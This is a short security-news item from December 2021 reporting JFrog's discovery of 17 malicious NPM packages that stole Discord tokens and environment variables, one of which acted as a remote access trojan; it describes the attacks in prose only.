Security News > 2021 > December > Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers

At least 17 malware-laced packages have been discovered on the NPM package Registry, adding to a recent barrage of malicious software hosted and delivered through open-source software repositories such as PyPi and RubyGems.

DevOps firm JFrog said the libraries, now taken down, were designed to grab Discord access tokens and environment variables from users' computers as well as gain full control over a victim's system.

As prior research has established, collaboration and communication tools like Discord and Slack have become handy mechanisms for cybercriminals, with Discord servers integrated into the attack chains for remotely controlling the infected machines and even to exfiltrate data from the victims.

"Cyber criminals are using Discord CDN to host malicious files as well as for command-and-control communication," cybersecurity firm Zscaler noted in an analysis earlier this February.

In light of these disclosures, it's no surprise that the theft of Discord access tokens could enable threat actors to use the platform as a covert data exfiltration channel, distribute malware to other Discord users, and even sell Discord Nitro premium accounts to other third-parties, who can then use them for their own campaigns.

Even more troublingly, the package "Prerequests-xcode" functioned as a full-fledged remote access trojan, a Node.JS port of DiscordRAT, that's equipped to capture screenshots, gather clipboard data, execute arbitrary VBScript and PowerShell code, steal passwords, and download malicious files, effectively granting the adversary the ability to take over the developer's system.

News URL

https://thehackernews.com/2021/12/over-dozen-malicious-npm-packages.html